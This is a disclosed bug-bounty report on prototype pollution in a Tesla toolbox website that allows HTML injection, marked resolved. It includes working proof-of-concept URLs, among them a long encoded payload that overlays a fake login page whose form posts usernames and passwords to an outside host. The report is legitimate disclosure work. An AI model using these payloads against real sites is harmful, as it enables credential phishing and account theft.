[toolbox.teslamotors.com] HTML Injection via Prototype Pollution / Potential XSS

Disclosed by
BlackFan
  • Program Tesla
  • Disclosed date about 2 months ago
  • Reward $200
  • Priority P4 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by BlackFan

Toolbox website uses the backbone.queryparams.js script which is vulnerable to Prototype Pollution.
Using the existing js code, it is possible to add arbitrary HTML to the page (but inline js is blocked by the CSP).

Report details
  • Submitted

  • Target Location

    *.teslamotors.com
  • Target category

    Website Testing

  • VRT

    Server-Side Injection > Content Spoofing > iframe Injection
  • Priority

    P4
  • Bug URL
    https://toolbox.teslamotors.com/
  • Description

    Toolbox website uses the backbone.queryparams.js script which is vulnerable to Prototype Pollution.

    For example:

    • Open URL https://toolbox.teslamotors.com/?__proto__.VULN=PROTOTYPE_POLLUTION
    • Check in the console that Object.prototype.VULN was created Screenshot at 15-16-00.png

    Using this, an attacker can change the logic of scripts that are executed next. For example, make HTML Injection (in fact, this is XSS, but the site has a strict Content-Security-Policy).

    HTML Injection PoC:

    https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&&__proto__.display_name=%3Cmarquee%3E&__proto__.display_name=1
    

    PoC with Fake Login page via fullscreen iframe:

    https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&__proto__.display_name=%3Ciframe/srcdoc=%27%3Chtml%20lang=%22en%22%3E%3Chead%3E%3Cbase%20href=%22https://toolbox.teslamotors.com/%22/%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/jquery-ui.min.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.bootstrap.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.tableTools.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.scroller.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-dialog.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-select.min.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-editable.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/font-awesome.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/tbxweb.css%22%3E%3C/head%3E%3Cbody%3E%3Cdiv%20id=%22body%22%3E%3Cdiv%20id=%22banner-layout%22%3E%3C/div%3E%3Cdiv%20id=%22main-menu%22%3E%3Cnav%20class=%22navbar%20navbar-default%20navbar-static-top%22role=%22navigation%22style=%22margin-bottom:0px%22%3E%3Cdiv%20class=%22container%22%3E%3Cdiv%20class=%22navbar-header%22%3E%3Cbutton%20type=%22button%22class=%22navbar-toggle%20collapsed%22data-toggle=%22collapse%22data-target=%22%23navbar%22aria-expanded=%22false%22aria-controls=%22navbar%22%3E%3Cspan%20class=%22sr-only%22%3EToggle%20navigation%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3C/button%3E%3Ca%20class=%22navbar-brand%22href=%22/%22style=%22padding-top:%200px;%20padding-left:%205px%22%3E%3Cimg%20style=%22height:75px%22alt=%22Brand%22src=%22/assets/images/tesla_flag.png%22%3E%3C/a%3E%3Ca%20class=%22navbar-brand%22style=%22font-size:%2023px%22href=%22/%22%3EToolbox%3C/a%3E%3C/div%3E%3Cdiv%20id=%22navbar%22class=%22navbar-collapse%20collapse%22%3E%3Cul%20class=%22nav%20navbar-nav%22%3E%3Cli%20class=%22dropdown%22%3E%3Ca%20href=%22/software/download%22class=%22dropdown-toggle%22role=%22button%22aria-expanded=%22false%22%3ESoftware%20%3Cspan%20class=%22caret%22%3E%3C/span%3E%3C/a%3E%3Cul%20class=%22dropdown-menu%22role=%22menu%22%3E%3Cli%3E%3Ca%20href=%22/software/download%22%3EDownload%3C/a%3E%3C/li%3E%3C/ul%3E%3C/li%3E%3C/ul%3E%3Cdiv%20id=%22search-form%22class=%22navbar-form%20navbar-left%22%3E%3C/div%3E%3Cdiv%20id=%22user-nav%22class=%22nav%20navbar-nav%20navbar-right%22%3E%3Cdiv%3E%3Cul%20class=%22nav%20navbar-nav%20navbar-right%22%3E%3Cli%3E%3Cspan%20class=%22glyphicon%20glyphicon-user%22aria-hidden=%22true%22%3E%3C/span%3E%20Login%20/%20Register%3C/a%3E%3C/li%3E%3C/ul%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/nav%3E%3C/div%3E%3Cdiv%20id=%22contents%22%3E%3Cdiv%3E%3Cdiv%20id=%22content%22class=%22container%22%3E%3Cform%20target=_parent%20action=//blackfan.ru/fk%20class=%22form-signin%22role=%22form%22%3E%3Ch2%20class=%22form-signin-heading%22%3E%3Cfont%20color=%22red%22%3E%3Cb%3EFAKE%3C/b%3E%3C/font%3E%20Toolbox%20Online%20Portal%20(External%20Site)%3C/h2%3E%3Cp%20id=%22error-text%22class=%22help-block%22%3E%3C/p%3E%3Cdiv%20class=%22form-group%22%3E%3Cinput%20id=%22username%22name=%22login%22class=%22form-control%20login-control%22placeholder=%22username%22autofocus=%22%22%3E%3Cinput%20id=%22password%22name=%22password%22type=%22password%22class=%22form-control%20login-control%22placeholder=%22password%22%3E%3C/div%3E%3Cdiv%20id=%22captcha-container%22%3E%3C/div%3E%3Cbutton%20id=%22login-btnx%22type=%22submit%22class=%22btn%20btn-default%20btn-block%22%3ESign%20in%3C/button%3E%3C/form%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/body%3E%3C/html%3E%27/style=%22position:fixed;top:0;left:0;bottom:0;right:0;width:100%25;height:100%25;border:none;margin:0;padding:0;overflow:hidden;z-index:999999;%22%3E%3C/iframe%3E&__proto__.display_name=1
    
    

    Screenshot at 15-19-50.png

  • HTTP request
    Empty
Activity